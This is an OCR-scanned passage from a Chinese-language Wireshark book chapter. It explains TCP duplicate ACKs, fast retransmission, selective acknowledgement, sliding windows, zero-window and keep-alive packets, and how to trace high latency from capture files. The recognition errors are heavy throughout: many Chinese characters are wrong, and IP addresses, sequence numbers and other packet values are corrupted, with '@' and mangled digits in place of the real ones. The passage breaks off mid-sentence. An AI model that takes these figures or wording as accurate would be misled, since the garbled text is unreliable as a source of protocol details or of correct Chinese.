个 7 6.966619 1L172。.31.136.85 195 .61.202.65 TCP 78 [TCP Dup ACK 1#3] 38769 > 80 [ACK] Seq=764338729 Ack=1316973186 Win=382 Len=@ TSval=22247.. 

































图 11-11 由 于 乱 序 数据 包 的 影响 ， 生 成 了 额外 的 重复 ACK 


捕获 文件 的 第 4 个 数据 包 是 发 送 主 机 以 错误 序号 发 送 的 另 一 个 数据 
区 块 @。 因 此 ， 接 收 主机 发 送 第 二 个 重复 ACK@。 接收 方 又 收 到 一 个 包 
I 这 导致 它 传输 第 三 个 、 也 是 最 后 一 个 重复 
ACK@. 


及 送 方 收 到 来 目 接收 方 的 第 三 个 重复 ACK 之 后 ， 束 强制 停止 所 有 的 
并 重新 发 送 丢 失 的 数据 包 。 图 11-12 显 示 了 丢失 数据 包 的 
快速 重 传 。 


和 在 Packet List 面 板 的 Info 列 中 再 次 出 现 了 重 传 数据 包 。 正 如 前 面 的 例 
子 ， 数 据 包 被 清楚 地 标记 为 黑 抵 红字。 这 个 数据 包 的 SEQ/ACK 分 析 部 
分 告诉 我 们 这 有 可 能 是 一 次 快速 求 重 传略 “再 次 注意 ， 数 据 包 的 快速 重 伟 
标记 信息 并 非 数 据 包 本 喘 的 值 ， 而 是 Wireshark 的 功能 ) 。 捕 获 记 有 杂 的 最 
后 一 个 数据 包 是 确认 收 到 快速 重 传 的 ACK 数 据 包 。 





顾 Wireshark , Packet 8 ,tcp_dupack 





> Frame 8: 1434 bytes on wire (11472 bits), 1434 bytes captured (11472 bits) 
> Ethernet II, Src: CiscoInc 72:15:06 (68:8b:be:72:15:86), Dst: HewlettP a4:cl:c6 (99:16:35:a4:c1:c6) 
> Internet Protocol Version 4, Src: 195.81.262.68, Dst: 172.31.136.85 
Y Transmission Control Protocol, src Port: 80 (38), Dst Port: 38769 (38768), Seq: 1319973186，Ack: 784338729, Len: 1368 
rce Port: 89 
i ion Port: 38766 
am index: 9] 
[TCP Segment Len: 1368] 
uence number: 1310973186 
number: 1319974554] 
mber: 7@94338729 


” Flags: 68x818 (ACK) 
Window size value: 1098 
[Calculated window size; 198 
[Window size scaling factor: -1 (unknown)] 
sum: @x9364 [validation disabled] 
Urgent pointer: 9 
» Options: (12 bytes), No-Operation (NOP), No-Operation (NOP), Timestamps 
Y [SEQ/ACK analysis] 
[Bytes in flight: 15848] 
Y [TCP Analysis Flags] 
» [Expert Info (Note/Sequence): This frame is a (suspected) fast retransmission] @ 
》 [Expert Info (Note/Sequence): This frame is a (suspected) retransmission] 





No,: 8 * Time: 0,000092 ' Sourrcer 195,81,202,68 ' Destination! 172.31,135.85 * Protoeol: TCP Le sion] 80 — 38780 [ACK] Seq= 1310973186 Ack=704339729 Win= 108 Len=1368 TSval= 1332354 TSecre=222 


Close ; ”Help 
on 





图 11-12 重复 ACK 引 发 了 丢失 数据 包 的 快速 重 传 
一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 


当 及 生 数 据 包 丢失 时 ， 可 能 影响 TCP 通 信 数 据 流 的 功能 是 选择 性 确认 《Selective 
Acknowledgement〉。 在 上 面 的 捕获 记录 里 ， 通 信 双 方 已 经 在 三 次 握手 过 程 中 协商 开局 了 选 
择 性 ACK。 因 此 ， 一 旦 数据 包 丢 失 并 收 到 重复 ACK， 即 使 在 丢失 数据 包 之 后 还 是 成 功 接收 了 
其 他 数据 包 ， 也 只 需要 重 传 丢 失 的 数据 包 。 如 果 不 司 用 选择 性 ACK， 那 承 必 须 重 新 传输 丢失 
数据 包 之 后 的 每 一 个 数据 包 。 选 择 性 ACK 使 得 数据 丢失 的 恢复 更 加 高 效 。 由 于 大 部 分 现代 
TCP/P 协 议 栈 的 实现 都 文 持 选择 性 ACK， 因 此 你 会 发 现 这 个 功能 通 利 都 会 被 启用 。 








11.2 ”TCP 流 控制 


重 传 和 重复 ACK 痢 是 TCP 反 应 性 的 功能 ， 补 设计 用 来 从 数据 包 丢 失 
中 恢复 。 如 朱 TCP 没 有 包 合 未 芋 形 式 的 用 于 预防 数据 包 丢 失 的 前 瞻 性 功 
能 ， 那 么 它 将 是 一 个 糟糕 的 协议 ， 但 幸好 它 做 到 了 。 


TCP 实 现 了 滑动 窗口 机 制 ， 用 于 检测 何 时 发 生 了 数据 包 丢 失 ， 并 调 
整数 据 伟 箱 速率 加 以 站 免 ， 清 动 窗口 机 制 利用 数据 搂 收 方 的 接收 窗口 来 
空 制 数据 流 . 


接收 窗口 是 数据 接收 方 指定 的 值 ， 和 存储 在 TCP 尖 部 以 字 市 为 里 
位 ) ， 它 告诉 发 送 设备 自己 希望 在 TCP 缓 冲 空间 中 存储 多 少数 据 。 这 个 
绥 神 空间 是 数据 在 可 以 癌 上 传递 到 等 竺 处 理 数 据 的 应 用 层 协议 之 前 的 临 


时 存储 空间 。 因 此 ， 及 送 方 一 次 只 能 友 送 窗口 大 小 域 指定 的 数据 量 。 为 
了 传输 更 多 的 数据 ， 接 收 方 必 须 及 送 硝 认 ， 以 告知 之 前 的 数据 已 经 接收 
到 了 。 它 也 必须 要 处 理 占用 TCP 绥 冲 空 间 的 数据 ， 以 清空 绥 冲 区 。 图 11- 
13 闸 明了 接收 窗口 是 如 何 工 作 的 。 


| 可 用 缓冲 空间 
客户 端 服务 端 


图 11-13 ”接收 窗口 使 得 接收 方 不 被 数据 淹没 


在 图 11-13 中 ， 客 户 端 正在 同 接 收 窗口 大 小 为 5000 字 节 的 服务 器 发 
送 数 据 。 冤 户 缠 发 这 了 2500 字 节 ， 将 服务 硕 的 可 用 绥 冲 空间 减少 到 2500 
字 节 ， 然 后 再 发 送 2000 字 节 ， 进 而 将 可 用 缓冲 区 减少 到 500 字 节 。 人 然后 
服务 器 送出 这 些 数 据 的 确认 ， 它 处 理 缓 冲 区 的 数据 ， 得 到 可 用 的 空 缓冲 
区 。 这 个 过 程 不 断 重复 ， 客 户 病 义 发 送 了 3000 字 节 和 男 外 1000 字 方 ， 将 
服务 器 的 可 用 缓冲 区 减少 到 1000 字 节 。 客 户 端 再 次 确认 这 些 数据 ， 并 处 
理 缓冲 区 的 内 容 。 


11.2.1 调整 窗口 大 小 


调整 突 口 大 小 的 过 程 相当 明确 ,但 有 时 候 它 也 不 上 尽 如 人 意 。 每 当 接 
收 到 数据 时 ，TCP 栈 束 生 成 并 友 壕 一 个 确认 作为 啊 应 ， 但 是 接收 方 不 可 
能 总 是 迅速 地 处 理 缓冲 区 的 数据 。 


当 一 台 娄 忙 的 服务 硕 处 理 来 目 多 个 各 户 问 的 数据 包 时 ， 服 务 硕 可 能 
会 因 绥 慢 地 清空 绥 冲 区 ， 而 腾 不 出 空间 来 接收 新 数据 。 如 果 没 有 流量 控 
制 ， 这 将 导致 数据 包 技 失 和 数据 损坏 。 焉 好 ， 当 服务 帮 太 棕 忙 ， 以 致 不 


能 以 宣告 的 接收 窗口 的 速率 处 理 数 据 时 ， 它 可 以 调整 接收 窗口 的 大 小 。 
它 通 过 减 小 同 发 送 方 返回 的 ACK 数 据 包 的 TCP 头 部 窗口 大 小 值 达 到 这 个 
日 的 。 图 11-14 展 示 了 这 样 的 例子 。 


[|] = 
| = 可 用 缓冲 空间 
客户 站 客户 端 
3000 字 节 5000 字 节 
5000 字 节 
ACK - 窗口 更 新 : 1000 字 节 1000 字 节 1000 字 节 
800 字 节 200 字 节 1000 字 节 
> [0 [ro | 
Ce 1000 节 |[ 1000 字 节 


图 11-14 ”服务 器 变 繁 忙 时 ， 可 以 调整 窗口 大 小 


在 图 11-14 中 ， 服 务 絮 一 开始 声明 的 窗口 大 小 是 5000 字 节 。 客 户 六 
发 送 了 2000 字 节 ， 紧 接着 再 发 送 2000 字 节 ， 只 留 下 1000 字 节 的 可 用 缓冲 
空间 。 服 务 需 意识 到 它 的 缓冲 区 很 快 束 要 被 塞 满 了 。 它 知道 如 果 按 此 速 
率 传输 数据 ， 那 数据 包 很 快 就 会 丢失 。 为 了 校正 这 个 问题 ， 服 务 器 癌 客 
户 端 发 送 一 个 确认 ， 包 含 更 新 的 窗口 大 小 为 1000 字 节 。 因 而 ， 客 户 端 会 
发 送 较 少 的 数据 ， 服 务 问 可 以 按照 能 接受 的 速率 处 理 缓冲 区 的 内 容 ， 从 
而 允许 数据 恒定 流动 。 


窗口 重 设 过 程 是 双向 工作 的 。 当 服务 器 能 更 快 地 处 理 数据 时 ， 它 可 
以 发 送 一 个 ACK 数 据 包 ， 指 明 更 大 的 窗口 大 小 。 
11.2.2 用 零 窗 口 通 知 停止 数据 流 


某 些 情况 下 ， 服 务 器 可 能 无 法 处 理 客户 端 发 送 的 数据 。 这 可 能 是 因 
为 内 存 人 不足 、 人 缺少 处 理 能 力 或 者 其 他 问题 。 这 可 能 导致 数据 包 中 止 、 通 
信 过 程 停止 ， 但 接收 窗口 能 够 将 负面 影响 最 小 化 。 


当 出 现 这 种 情况 时 ， 服 务 夫 可 以 及 送 一 个 数据 包 ， 指 明 窗 口 大 小 是 


零 。 当 客户 内 收 到 这 个 数据 包 时 ， 它 会 仓 止 所 有 数据 传输 ， 但 仍 通 过 传 
输 “ 保 活 数据 包 〈keep-alive packets) ”保持 与 服务 需 的 连接 。 客 户 病 质 
期 性 地 发 送 保 活 数 据 包 ， 以 检查 服务 器 接收 窗口 的 状态 。 一 旦 服务 右 能 
再 次 处 理 数据 ， 它 融会 啊 应 一 个 非 零 的 窗口 大 小 ， 这 时 通信 恢复 。 图 
11-15 显 示 了 和 堆 窗 口 通知 的 例子 。 


一 | | 可 用 缓冲 空间 
客户 端 服务 端 
3,000 字 节 5.000 字 节 
5.000 字 节 
KR 
ACK -窗口 更 新 : 1.000 Bytes 


图 11-15” 当 窗口 大 小 设 为 0 字 节 时 ， 数 据 传 输 就 停止 了 


在 图 11-15 中 ， 服 务 器 开始 用 5000 字 节 的 窗口 接收 数据 。 在 从 客户 
痛 接 收 到 4000 字 节 的 数据 后 ， 服 务 规 开始 承 党 沉重 的 处 理 负 担 ， 不 能 
处 理 来 目 客 尸 问 的 任何 数据 。 这 时 服务 占 友 壕 一 个 数据 包 ， 将 禄 口 大 小 
域 设 为 0。 客 尸 喘 暂停 数据 传输 ， 并 友 壕 一 个 傈 活 数 据 包 。 收 a 到 你 活 数 
据 包 之 后 ， 服 务 带 啊 应 一 个 数据 包 ， 退 知客 尸 珊 它 现在 可 以 接收 数据 
了 ， 而 且 它 现在 的 窗口 大 小 是 1000 字 节 。 客 户 端 继续 发 送 数据 。 


11.2.3” TCP 滑动 窗口 实战 


看 完 TCP 滑 动 窗 口 的 理论 之 后 ， 我 们 将 在 捕获 文件 


tcp_zerowindowrecovery. pcap 中 探究 它 。 


在 这 个 文件 中 ， 我 们 从 192.168.0.20 发 送 给 192.168.0.30 的 几 个 TCP 
ACK 数 据 包 开始 。 我 们 主要 对 Windows Size 域 感 兴趣 ， 可 以 在 Packet 
List 面 板 的 Pmfo 列 以 及 Packet Details 面 板 的 TCP 头 部 看 到 它 。 从 图 11-16 可 
以 立即 发 现 ， 在 前 面 的 3 个 数据 包 中 ， 这 个 域 的 值 不 断 减 小 。 


No. Time 人 Source Destination Protocol Length Info © 
1 0.000000 192.168.9.20 192.168.09.390 TCP 69 2235 3 1728 [ACK] Seq=1422793785 Ack=2718996659 Win=8768 Len=@ 


2 .8.808237 192.168.8.28 192.168.8.38 TCP 58 2235 3 1728 [ACK] Seq=1422793785 Ack=2718999579 Win=5848 Len= 
3 .80080193 192.168.8.28 192.168 .8.38 TeE 68 2235 3 1728 [ACK] Seq=1422793785 Ack=2711682499 Win=2928 Len=2 





图 11-16 这些 数 据 包 的 窗口 大 小 在 递减 


这 个 值 从 第 一 个 数据 包 的 8760 字 节 减 少 到 第 二 个 数据 包 的 5840 字 
节 ， 接 着 叉 减 为 第 三 个 数据 包 的 2920 字 节 @。 窗 口 大 小 值 递减 是 主机 延 
述 增加 的 典型 指标 。 注 意 一 下 Time 列 的 信息 ， 这 是 在 极 短 的 时 间 内 发 生 
的 @。 当 窗口 大 小 像 这 样 快速 减 小 时 ， 它 很 可 能 会 减 至 零 ， 如 图 11-17 
所 示 ， 数 据 包 4 正 是 这 样 的 情形 。 


帮 Wireshark , Packet 4 "tcp_zerowindowrecovery 





Frame 4: 69 bytes on wire (488 bits), 68 bytes captured (488 bits) | 
Ethernet II, Src: Vmware ce:09:98 (80:58:56:c80:88:88), Dst: Vmware c8@:80:81 (88:58:56:c8:80:081) | 
Internet Protocol Version 4, Src: 192.168.09.29，Dst: 192.168.9.39 | 
v Transmission Control Protocol, Src Port: 2235 (2235), Dst Port: 1729 (1728), Seq: 1422793785，Ack: 2711995419，Len: 8 | 


[TCP Segment Len: 8] 
Sequence number: 1422793785 
Acknowledement number: 2711065419 
Header Length: 28 bytes 
Fla ags: Ox i 2 
e [2 


: ( n 
”Checksum: x 6355 [validation disabled] 
Urgent pointer: 8 
Y [SEQ/ACK Re 
Y [TCP Analysis Flags] 
v [Expert Info (Warn/Sequence): TCP Zero Window segment] ©@ 








No.r 4 * Timer 0.000202 * Source: 192,168,0.20 * Destination: 192,168.0.30 * Protoeol: TCP * Length: 50 * Info: [TCP ZeroWindow) 2235 — 1720 [ACK) Seq=1422793785 Ack=2711005419 Win=0 Len=0 


Close Help 








图 11-17 零 窗 口 数 据 包 说 明了 主机 不 能 再 接收 任何 数据 


第 4 个 数据 包 也 是 从 192.168.0.20 发 往 192.168.0.30 的 ， 但 它 的 目的 是 
告诉 192.168.0.30 它 不 能 再 接收 任何 数据 。 在 TCP 头 部 束 可 以 看 到 这 个 数 
值 0@O， 而 且 Wireshatk 也 在 Packet List 面 板 的 Info 列 以 及 TCP 头 部 
SEQ/ACK Analysis 部 分 ， 告 诉 我 们 这 是 一 个 零 窗口 数据 包 全 。 


一 旦 收 到 零 窗 口 数据 包 ，192.168.0.30 这 个 设备 就 不 再 发 送 任何 数 
据 ， 直 到 它 从 192.168.0.20 收 到 一 个 窗口 更 新 ， 通 知 它 窗 口 大 小 已 经 增 
长 了 为 止 。 科 好 ， 在 这 个 捕获 文件 里 ， 导 致 零 窗 口 的 问题 是 午时 的 。 
此 ， 如 图 11-18 所 示 ， 发 送 的 下 一 个 数据 包 束 是 窗口 更 新 。 





二 Wireshark . Packet 5,tcp_zerowindowrecovery 口 ~ 





” Frame 5: 69 bytes on wire (488 bits), 66 bytes captured (488 bits) 

> Ethernet II, Src: Vmware coO:090:98 (60:50:56:c0:880:88), Dst: Vmware _c@:00:01 (806:58:56:c0:80:81) 

” Internet Protocol Version 4, Src: 192.168.8.28, Dst: 192.168.8.38 

Y Transmission Control Protocol, Src Port: 2235 (2235), Dst Port: 1728 (1728), Seq: 1422793785, Ack: 2711065419，Len: 9 


X 

[TCP segment Len: 8] 

Sequence number: 1422793785 
Acknowledement number: 2711885419 


» Flags: @x818 (ACK) 

Window size value: 64249 OO 

[Calculated window size: 64248] 

ze scaling factor: -1 (unknown)] 

> Checksum: Bx6864 [validation disabled] 

Urgent pointer: 人 
v [SEQ/ACK analysis] 

YY [TCP Analysis Flags] 

Y [Expert Info (Chat/Sequence): TCP window update] 








[TCP window update] 
[Ss ity level: Chat] 
[Groeup: Sequence] 








No.: 5 " Timer .010005 * Sourcer 192.188.0,.20 * Destination: 192,168.0.30 * Proweo: TCP * Length: 60 * ntb: {TCP Window Updste) 2235 — 1720 ACK)] Seq=1422793785 Aci=2711005419 Win=64240) [en 








图 11-18 ”TCP 窗口 更 新 数据 包 告 诉 其 他 主机 它 又 可 以 传输 数据 了 


在 这 个 例子 中 ， 窗 口 大 小 增长 到 了 非常 健康 的 64240 字 节 @@， 
Wireshark 再 一 次 在 SEQ/ACK Analysis 标 题 下 面 告诉 我 们 ， 这 是 一 个 究 口 
更 新 。 


一 旦 收 到 这 个 更 新 数据 包 ，192.168.0.30 主 机 就 可 以 再 次 发 送 数 
据 ， 如 数据 包 6 和 7 所 示 。 这 个 过 程 非常 迅速 。 束 算 它 只 是 多 持续 一 反 扩 
时 则 ， 也 可 能 会 引起 网 络 “ 打 吧 ”， 导 人 致 数据 传输 变 慢 或 失败 。 


最 后 再 看 滑动 窗口 ， 查 看 一 下 tcp_zerowindowdead.pcap 文 件 。 捕 获 
记录 中 的 第 一 个 数据 包 是 从 195.81.202.68 发 送 到 172.31.136.85 的 正常 
HTTP 流 量 。 如 图 11-19 所 示 ， 案 接 看 束 是 一 个 从 172.31.136.85 人 返回 的 零 
窗口 数据 包 。 


这 看 起 来 跟 图 11-17 里 的 零 窗 口 数 据 包 非 常 相似 ， 但 结果 却 很 不 相 
同 。 在 图 11-20 中 ， 我 们 并 没有 看 到 172.31.136.85 主 机 发 送 使 通信 恢复 的 
窗口 更 新 ， 而 是 看 到 一 个 保 活 数据 包 。 





帮 Wireshark .Packet 2 .tcp_zerowindowdead 一 口 xX 





Frame 2: 66 bytes on wire (528 bits), 66 bytes captured (528 bits) 
Ethernet II, Src: HewlettP a4:cl1l:c6 (96:16:35:a4:c1:c6)，Dst: All-HSRP-routers 91 (90:09:9c:97:ac:91) 
Internet Protocol Version 4, Src: 172.31.136.85, Dst: 195.81.202.68 
Transmission Control Protocol, Src Port: 38768 (38768), Dst Port: 88 (88), Seq: 784338729, Ack: 1318997786, Len: 9 
Source Port: 38760 
Destination Port: 89 
[Stream index: 9] 
[TCP Segment Len: 9] 
sequence number: 784338729 
Acknowledgment number: 1318997786 
Header Length: 32 bytes 
> Flags: 8x818 (ACK) 
Window size value: 9 
[Calculated window size: 9] 
[Window size scaling factor: -1 (unknown)] 
> Checksum: 9x36d9 [validation disabled] 
Urgent pointer: 9 
> Options: (12 bytes), No-Operation (NOP), No-Operation (NOP), Timestamps 
v [SEQ/ACK analysis] 
This is an ACK to the segment in frame: 1 
[The RTT to ACK the segment was: 8.888029888 seconds] 
Y [TCP Analysis Flags] 
> [Expert Info (Warn/Sequence): TCP Zero Window segment] 


< vv™ 











No.: 2 " Time: 0.000029 * Source: 172,31,136.85 * Destination: 195.81.202,.68 * Protoeol: TCP Window) 38760 — 80 {ACK) Seq=704338729 Ack=1310997786 Win=0 Len=0 TSYal=22248305 TSecr=13: 


[cose | tep 








图 11-19 和 零 窗 口 数 据 包 使 数据 传输 暂停 


P| Wireshark . Packet 3 . tcp_zerowindowdead 


Frame 3: 66 bytes on wire (528 bits), 66 bytes captured (528 bits) 
Ethernet II, Src: CiscolInc 72:15:80 (80:6b:be:72:15:86), Dst: HewlettP a4:cl:c6 (80:16:35:a4:cl1:c6) 
Internet Protocol Version 4, Src: 195.81.2802.68, Dst: 172.31.136.85 
Transmission Control Protocol, Src Port: 88 (88), Dst Port: 38768 (38768), Seq: 1318997785, Ack: 784338729, Len: 98 
Source Port: 89 
Destination Port: 38766 
[Stream index: @] 
[TCP Segment Len: 8] 
Sequence number: 1318997785 
Acknowledgment number: 784338729 
Header Length:; 32 bytes 
Flags: 0x818 (ACK) 
Window size value: 198 
[calculated window size: 188] 
[Window size scaling factor: -1 (unknown)] 
Checksum: Bx3311 [validation disabled] 
Urgent pointer: 9 
Options: (12 bytes), No-Operation (NOP), No-Operation (NOP), Timestamps 
[SEQ/ACK analysis] 
Y [TCP Analysis Flags] 
Y [Expert Info (Note/Sequence): TCP keep-alive segment] ©O@ 
[TCP keep-alive segment] 
[Severity level: Note] 
[Group: Sequence] 


No 了 Time’ 3.410576 " Sourcer 195.81,202,68 * Destinatiom 172,31,136,85 * Proweol: TCP «fve) 80 — 38760 [ACK) Seq=1310997785 Ack=704338729 Win=108 Len=0 TS5val=1334338 TSecr=2224 


[ce |]| rep | 





图 11-20” 保 活 数 据 包 保证 零 窗 口 主机 仍然 在 线 


Wireshark 在 Packet Details 面 板 中 TCP 头 部 的 SEQ/ACK Analysis 标 题 
下 ， 将 这 个 数据 包 标 记 为 保 活 数据 包 伯 .我 们 从 Time 列 可 得 知 ， 在 收 到 
上 一 个 数据 包 3.4s 后 ， 出 现 了 这 个 数据 包 。 如 图 11-21 所 示 ， 这 个 过 程 义 
持续 了 几 次 : 一 台 主 机 发 送 零 窗口 数据 包 ， 男 一 台 则 发 运 你 活 数 据 包 。 





图 11-21 和 零 窗 口 和 保 活 数据 包 不 断 出 现 


这 些 保 活 数据 包 以 3.4s、6.8s、13.5s 的 间隔 出 现 @。 这 个 过 程 可 能 
会 持续 相当 长 的 时 间 ， 这 取决 于 通信 设备 采用 了 哪个 操作 系统 。 在 这 个 
例子 中 ， 你 可 以 发 现 ， 随 着 Time 列 数值 的 增长 ， 连 接 暂 停 了 将 近 25s。 
想象 一 下 ， 尝 试问 域 控 制 器 认证 或 者 从 网 上 下 载 文 件 时 ，25s 的 延迟 真 
是 难以 接受 ! 


11.3 ”从 TCP 错 误 控 制 和 流量 控制 中 学 到 的 


让 我 们 具体 看 一 下 重 传 、 重 复 ACK 和 滑动 窗口 机 制 。 下 面 是 处 理 延 
迟 问 题 的 一 些 注意 事项 。 


1. 重 传 数据 包 


及 生 重 传 是 因为 客户 站 检 训 到 服务 谷 设 有 接收 到 它 肥 大 的 数据 。 因 
此 ， 能 合 看 到 午 传 取决 于 你 在 分 析 通 信和 的 哪 一 问 。 如 果 你 从 服务 占 那 闹 
捕获 数据 ， 并 且 它 硝 实 疫 有 接收 到 各 户 站 发达 、 重 传 的 数据 包 ， 那 你 将 
匀 家 在 或 里 ， 因 为 你 看 不 到 重 传 的 数据 包 。 如 琳 你 怀疑 服务 硕 那 刀 受 到 
了 数据 包 丢 失 的 影响 ，《 可 能 的 医 ) 你 应 该 考 碟 在 香 户 疹 那 边 捕获 流量 
以 观察 是 个 有 重 传 效 扼 包 。 


2. 重复 ACK 数 据 包 


我 倾 同 于 把 重复 ACK 看 作 重 传 的 表面 对 江 词 (pseudo-opposite ) ， 
因为 当 服 务 右 检测 到 来 目 客 户 疾 的 数据 包 技 失 时 就 发 送 它 。 在 多 数 情 况 
下 ， 你 可 以 在 通信 两 端 捕获 到 重复 ACK 的 流量 。 记 住 ， 当 接收 到 乱 序 数 
据 包 时 才 触 发 重复 ACK。 例 如 ， 如 果 服 务 右 只 接收 到 了 第 1 个 和 第 3 个 数 
据 包 ， 束 会 发 送 一 个 重复 ACK 以 引发 第 2 个 数据 包 的 快速 重 传 。 由 于 你 
己 经 接收 到 第 1 个 和 第 3 个 数据 包 ， 那 不 党 什么 情况 导致 第 2 个 数据 包 丢 
失 ， 都 可 能 只 是 暂时 的 ， 因 此 在 大 部 分 情况 下 ， 你 可 以 成 功 发 送 并 接收 


重复 ACK。 当 然 ， 有 时 候 这 个 情况 也 未 必 成 立 。 因 此 ， 当 你 在 服务 器 端 
怀疑 有 数据 包 丢 失 却 没有 看 到 任何 重复 ACK 时 ， 可 以 考虑 在 通信 的 客户 
剖 捕 获 数 据 包 、。 


3. 零 窗口 和 保 活 数 据 包 


消 动 窗口 与 服务 占 接 收 、 处 理 数 据 的 故障 卫 接 相关 。 服 务 右 的 守 些 
问题 可 以 直接 导致 窗口 大 小 减少 或 达到 零 窗 口 状态 ， 因 此 如 末 你 及 现 这 
样 的 情况 ， 就 应 该 集中 调 合 那里 。 通 第 你 会 在 网 络 通 信 的 两 端 看 见 窗 口 
更 新 数据 包 。 


11.4 定位 高 延迟 的 原因 


有 时 候 ， 数 据 包 丢 失 并 不 是 延迟 的 原因 。 也 许 你 会 发 现 ， 当 两 台 主 
机 则 通信 很 慢 时 ， 并 没有 TCP 重 传 或 重复 ACK 这 样 的 常见 特征 。 在 这 些 
情况 下 ， 你 需要 采用 其 他 技术 来 定位 高 延迟 的 原因 。 


在 这 里 ， 最 有 效 的 办 法 之 一 是 栓 看 礼 始 连接 握手 以 及 接 下 来 的 两 个 
数据 包 。 例 如 ， 考 虑 客户 端 和 Web 服 务 器 之 间 的 一 个 简单 连接 ， 客 户 端 
笑 试 浏览 托管 在 服务 右上 的 一 个 站 点 。 我 们 关注 通信 序列 里 的 前 6 个 数 
据 包 ， 包 括 TCP 握 手 、 初 始 HTTP GET 请 求 、 对 这 个 GET 请 求 的 确认 ， 
以 及 从 服务 需 发 往 客 户 问 的 第 一 个 数据 包 。 


| 六 总 


为 了 跟 紧 本 章节 ， 请 确保 你 已 经 在 Wireshark 中 设置 了 恰当 的 时 间 显 示 格 式 。 在 Wireshark 
中 选择 View -> Time Display Format -> Seconds Since Previous Displayed Packet。 





11.4.1 正常 通信 


我 们 将 在 本 重 的 稍 后 部 分 详细 讨论 网 络 基线 。 目 前 ， 只 知 近 你 需要 
一 个 正 芝 通信 的 基线 ， 并 与 高 延迟 的 情况 作 比 较 。 在 这 些 例 子 中 ， 我 们 
将 使 用 latency1.pcap 文 件 。 由 于 我 们 已 经 讨论 过 了 TCP 握 手 和 HTTP 通 信 


的 细节 ， 因 此 在 这 里 我 们 将 跳 过 它们 。 实 际 上 ， 我 们 根本 不 需要 再 看 
Packet Details 面 板 。 如 图 11-22 所 示 ， 我 们 只 关心 Time 列 。 





图 11-22 ”这 些 流量 发 生得 相当 快 ， 被 认为 是 正常 的 
这 个 通信 序列 是 相当 快 的 ， 全 过 程 化 了 不 到 0.1s。 
接 下 来 我 们 查看 的 几 个 捕获 文件 将 包含 相同 的 流量 模式 ， 只 是 在 数 


据 包 时 序 上 有 些许 不 同 。 


11.4.2” 慢 速 通信 线路 延 撑 





现在 我 们 转向 捕获 文件 latency2.pcap。 如 图 11-23 所 示 ， 注 意 ， 除 了 
时 间 值 之 外 ， 所 有 数据 包 都 和 上 一 个 文件 中 的 相同 。 








图 11-23 ”数据 包 2 和 5 有 很 高 的 延迟 


当 我 们 开始 逐个 查看 这 6 个 数据 包 时 ， 会 很 快 遇 到 延迟 的 第 一 个 标 
蕊 。 和 客户 疾 (172.16.16.128) 及 送 初 始 SYN 数 据 包 ， 开 始 TCP 握 手 。 在 
收 到 服务 端 〈74.125.95.104) 返回 的 SYN/ACK 数 据 包 之 前 有 0.87s 的 延 
壕 。 这 是 我 们 受到 线路 延 人 运 影 啊 的 第 一 个 迹象 ， 这 是 涤 户 闹 和 服务 器 之 
间 的 设备 导致 的 。 


由 于 数据 包 传 输 的 特性 ， 我 们 可 以 确定 这 是 线路 延迟 的 问题 。 当 服 
务 器 收 到 一 个 SYN 数 据 包 时 ， 由 于 不 涉及 任何 传输 层 以 上 的 处 理 ， 因 此 
发 送 一 个 响应 只 需要 非常 小 的 处 理 量 。 即 使 服务 器 正 承受 巨大 的 流量 负 
载 ， 通 音 它 也 会 迅速 地 同 SYN 数 据 包 啊 应 一 个 SYNVACK。 这 排除 了 服 
务 器 导致 高 延迟 的 可 能 性 。 


客户 是 的 可 能 性 也 被 排除 了 ， 因 为 它 在 此 时 除了 接收 SYN/ACK 数 


扼 包 以 外 什么 也 没 干 。 排 除了 各 户 背 和 服务 硕 的 原因 ， 那 么 网 络 缓慢 的 
原因 应 该 在 捕获 记录 的 前 两 个 数据 包 里 。 


继续 看 ， 我 们 发 现 完成 三 次 握手 的 ACK 数 据 包 传输 很 快 ， 客 户 病 发 
送 的 HTTP GET 请 求 也 同样 如 此 。 产 生 这 两 个 数据 包 的 处 理 过 程 是 收 到 
SYINVACK 后 在 客户 内 本 地 发 生 的 ， 所 以 只 要 客户 端 没 有 沉重 的 处 理 负 
载 ， 这 两 个 数据 包 应 该 立刻 就 能 发 出 去 。 


在 数据 包 5， 我 们 看 到 它 的 时 间 值 也 高 得 令 人 难以 置信 。 和 看 来 ， 我 
们 发 送 初 始 HTTP GET 请 求 之 后 ， 经 过 1.15s 才 收 到 从 服务 器 返回 的 ACK 
数据 包 。 收 到 HTTP GET 请 求 后 ， 服 务 需 在 发 送 数据 之 前 先 发 送 了 一 个 
TCP ACK， 同 样 这 也 不 需要 服务 喜 耗 费 太 多 处 理 资 源 。 这 是 线路 延迟 的 
pn 


每 次 过 上 线路 延迟 ， 你 几乎 都 会 在 通信 过 程 中 初始 握手 的 
SYN/ACK 以 及 其 他 ACK 数 据 包 中 看 到 这 样 的 情景 。 虽 然 这 个 信息 并 没 
告诉 你 网 络 高 延迟 的 确切 原因 ， 但 它 起 码 告 诉 你 不 是 客户 问 或 服务 占 
的 问题 ， 所 以 你 能 意识 到 延迟 是 因为 中 间 的 一 些 设备 出 了 问题 。 此 刻 ， 
你 可 以 开始 检查 受 影响 主机 之 间 的 防火 场 、 路 由 规 、 代 理 服 务 规 等 设 
备 ， 以 确定 问题 所 在 。 


11.4.3 ”通信 绥 怪 一 客户 着 延迟 


我 们 得 看 的 下 一 个 延迟 情景 包含 在 latency3.pcap 文 件 中 ， 如 图 11-24 
所 示 。 





图 11-24 ”这 个 捕获 记录 中 的 缓慢 数据 包 是 切 始 HTTP GET 请 求 数据 包 


唱 开 始 这 个 捕获 记录 很 正常 ， 迅 速 完成 了 TCP 握 手 ， 没 有 任何 延 
迟 。 但 握手 完成 之 后 ， 数 据 包 4 的 HTTP GET 请 求 出 现 了 问题 。 该 数据 包 
继 上 一 个 数据 包 有 1.34s 的 延迟 。 


我 们 应 起 奏 看 数据 包 3 和 4 之 间 到 撒 及 生 了 什么 ， 以 找到 延迟 的 诛 


因 。 数 据 包 3 是 TICP 握 手 过 程 中 客户 疹 发 往 服 务 需 的 最 后 一 个 ACK， 数 
据 包 4 则 是 客户 端 发 往 服务 器 的 GET 请 求 。 它 们 的 共同 点 在 于 都 是 客户 
端 发 送 的 ， 与 服务 器 无 关 。 发 送 完 ACK 之 后 本 应 该 很 快 就 发 送 GET 请 
求 ， 因 为 所 有 动作 都 古 以 客户 并 为 中 心 的 。 

不 竺 的 是 ，ACK 并 没有 快速 切换 到 GET 请 求 。 创 建 和 传输 GET 数 据 


包 确 实 需要 应 用 层 的 处 理 ， 而 这 个 处 理 过 程 的 延 玉 表明 客户 端 无 法 及 时 
